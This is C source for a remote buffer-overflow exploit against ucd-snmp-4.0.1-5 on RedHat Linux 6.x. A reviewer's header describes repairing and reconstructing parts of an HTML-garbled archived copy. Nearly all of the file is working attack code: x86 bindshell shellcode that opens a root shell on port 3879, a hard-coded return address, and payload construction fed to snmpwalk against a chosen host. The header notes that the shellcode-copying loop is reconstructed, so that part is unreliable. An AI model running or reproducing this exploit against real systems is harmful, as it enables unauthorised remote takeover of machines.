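/*
 * Remote SNMPd Linux x86 root exploit
 *
 * exploit by "you dong-hun" (Xpl017Elz)
 * My World: http://x82.i21c.net
 *
 * Target (per the banner and DEFAULT_CODE): ucd-snmp-4.0.1-5 on RedHat
 * Linux 6.x, with a hard-coded stack address for the shellcode.
 *
 * NOTE(review): the archived listing was HTML-garbled -- the two #include
 * lines and the loop that copies the shellcode and the return address
 * into the buffer were eaten by an angle-bracket stripper (the fragment
 * "num_3>0)&0xff;" is what survived of "shelladdr>>0)&0xff").  Those
 * parts are reconstructed below from the surviving fragment and from the
 * layout the program itself prints:
 *     [&shellcode: values bytes] [NOP + shellcode: 256-values bytes] [0x00]
 * i.e. '@' padding, then the shellcode, then values/4 little-endian
 * copies of the address, then the terminating NUL (257 bytes in total
 * when values is a multiple of 4).  Verify against the original
 * advisory before relying on the exact byte layout.
 *
 * Review fixes relative to the archived code:
 *   - host[] was sized by the "127.0.0.1" literal (10 bytes) and filled
 *     with strcpy(): any longer -h argument overflowed the exploit's own
 *     stack.  Now a 256-byte buffer filled with snprintf() and checked.
 *   - -v came from atoi() unchecked: a negative value passed the
 *     "(256-values) < 0x82" test and made the padding loop run past
 *     xOx[257].  Now parsed with strtol() and range-checked.
 *   - shelladdr (unsigned long) was printed with %p (UB); now %#lx.
 *   - banrl()/usages() had implicit int return types and no prototypes.
 *   - execl() failure was silent; now reported.  Error paths exit
 *     non-zero instead of 0.
 *
 * Only run this against hosts you are authorized to test.
 */
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define DEFAULT      0
#define VALUES       68
#define HOST         "127.0.0.1"
#define DEFAULT_CODE 0xbfffd83c          /* RedHat Linux 6.x ucd-snmp-4.x.x */
#define SNMPWALK     "/usr/bin/snmpwalk" /* snmpwalk PATH */

#define PAYLOAD_LEN  257                 /* bytes passed to snmpwalk, incl. NUL */
#define HOST_MAX     256                 /* room for a hostname / address */
#define MIN_CODE_ROOM 0x82               /* minimum bytes left for NOP+shellcode */

/* Prints the tool banner to stdout. */
static void banrl(void);
/* Prints usage for program name `var` to stderr. */
static void usages(const char *var);

/*
 * Builds the 257-byte payload and exec()s snmpwalk with it as the second
 * positional argument (presumably the community string of ucd-snmp 4.x's
 * snmpwalk -- confirm against the advisory).
 *
 * Options:
 *   -h host     target host (default HOST)
 *   -s address  address the return-address slots are filled with
 *               (default DEFAULT_CODE)
 *   -v value    number of bytes reserved for return-address copies;
 *               256 - value bytes remain for padding + shellcode
 *
 * Returns EXIT_FAILURE on bad arguments or if execl() fails; on success
 * the process image is replaced by snmpwalk and main does not return.
 */
int main(int argc, char *argv[])
{
    /* Linux(x86) bindshell on port 3879 (the 0x0f27 stored below). */
    static const char shellcode[] =
        "\x89\xe5\x31\xd2\xb2\x66\x89\xd0\x31\xc9\x89\xcb\x43\x89\x5d\xf8"
        "\x43\x89\x5d\xf4\x4b\x89\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89"
        "\x45\xf4\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\x0f\x27\x89\x4d\xf0"
        "\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10\x89\xd0\x8d\x4d\xf4\xcd"
        "\x80\x89\xd0\x43\x43\xcd\x80\x89\xd0\x43\xcd\x80\x89\xc3\x31\xc9"
        "\xb2\x3f\x89\xd0\xcd\x80\x89\xd0\x41\xcd\x80\xeb\x18\x5e\x89\x75"
        "\x08\x31\xc0\x88\x46\x07\x89\x45\x0c\xb0\x0b\x89\xf3\x8d\x4d\x08"
        "\x8d\x55\x0c\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh";

    char xOx[PAYLOAD_LEN] = {0};       /* payload; last byte stays NUL */
    char host[HOST_MAX] = HOST;
    const char *snmpwalk = SNMPWALK;
    long values = VALUES;
    unsigned long shelladdr = DEFAULT_CODE;
    int opt;

    banrl();

    while ((opt = getopt(argc, argv, "h:s:v:")) != -1) {
        char *end = NULL;

        switch (opt) {
        case 'h':
            /* Bounded copy: the original strcpy() into a 10-byte array
             * overflowed on any hostname longer than "127.0.0.1". */
            if (snprintf(host, sizeof host, "%s", optarg) >= (int)sizeof host) {
                fprintf(stderr, "\n - Host name too long (max %d bytes).\n\n",
                        HOST_MAX - 1);
                return EXIT_FAILURE;
            }
            break;
        case 's':
            errno = 0;
            shelladdr = strtoul(optarg, &end, 0);
            if (end == optarg || *end != '\0' || errno == ERANGE) {
                fprintf(stderr, "\n - Bad shellcode address: %s\n\n", optarg);
                return EXIT_FAILURE;
            }
            break;
        case 'v':
            errno = 0;
            values = strtol(optarg, &end, 10);
            if (end == optarg || *end != '\0' || errno == ERANGE) {
                fprintf(stderr, "\n - Bad value: %s\n\n", optarg);
                return EXIT_FAILURE;
            }
            break;
        default:
            usages(argv[0]);
            return EXIT_FAILURE;
        }
    }

    /* values must leave at least MIN_CODE_ROOM bytes for padding +
     * shellcode.  A negative value used to slip past this test and run
     * the padding loop beyond xOx[]. */
    if (values < 0 || values > 256 || (256 - values) < MIN_CODE_ROOM) {
        fprintf(stdout, "\n - Values error. :-(\n\n");
        fprintf(stdout, " Space that shellcode comes is so narrow.\n");
        fprintf(stdout, " Compose exploit again.\n\n");
        return EXIT_FAILURE;
    }

    /* Layout: '@' padding, shellcode, values/4 copies of shelladdr.
     * pad + sc_len + 4*(values/4) <= 256, so xOx[256] is always NUL. */
    size_t sc_len = strlen(shellcode);  /* no embedded NUL in the shellcode */
    size_t code_room = (size_t)(256 - values);
    if (sc_len > code_room) {           /* cannot happen with MIN_CODE_ROOM, kept as a guard */
        fprintf(stderr, "\n - Shellcode (%zu bytes) does not fit.\n\n", sc_len);
        return EXIT_FAILURE;
    }
    size_t pad = code_room - sc_len;
    size_t count = 0;

    for (size_t i = 0; i < pad; i++)
        xOx[count++] = '@';

    for (size_t i = 0; i < sc_len; i++)
        xOx[count++] = shellcode[i];

    /* Little-endian address, repeated (reconstructed loop, see header). */
    for (long i = 0; i < values / 4; i++) {
        xOx[count++] = (char)((shelladdr >> 0) & 0xff);
        xOx[count++] = (char)((shelladdr >> 8) & 0xff);
        xOx[count++] = (char)((shelladdr >> 16) & 0xff);
        xOx[count++] = (char)((shelladdr >> 24) & 0xff);
    }

    if (count >= sizeof xOx) {          /* defensive; arithmetic above forbids it */
        fprintf(stderr, "\n - Internal error: payload overflow.\n\n");
        return EXIT_FAILURE;
    }

    fprintf(stdout, " Shellcode Address: %#lx\n", shelladdr);
    fprintf(stdout, " Host: %s\n", host);
    fprintf(stdout, " [&shellcode: %ldbyte] [NOP + shellcode: %ldbyte] [0x00] - total 257byte\n",
            values, 256 - values);
    fprintf(stdout, " Open Port: 3879 (Default)\n\n");

    /* Explicit argv, no shell: host and payload are not re-parsed. */
    execl(snmpwalk, "snmpwalk", host, xOx, (char *)NULL);
    perror(snmpwalk);                   /* only reached if exec failed */
    return EXIT_FAILURE;
}

static void banrl(void)
{
    fprintf(stdout, "\n UCD-snmp-4.0.1-5 Remote Buffer Overflow exploit\n\n");
    fprintf(stdout, "\t\t Exploit made by Xpl017Elz\n\n");
}

static void usages(const char *var)
{
    fprintf(stderr, "\n Usage: %s -h [hostname] -s [address] -v [value]\n", var);
    fprintf(stderr, "\n option: -h - IP address & Domain name");
    fprintf(stderr, "\n         -s - Shellcode Address");
    fprintf(stderr, "\n         -v - &Shellcode Size\n\n");
    fprintf(stderr, "\n example: %s -h 127.0.0.1 -s 0xbfffd710 -v 112\n\n", var);
}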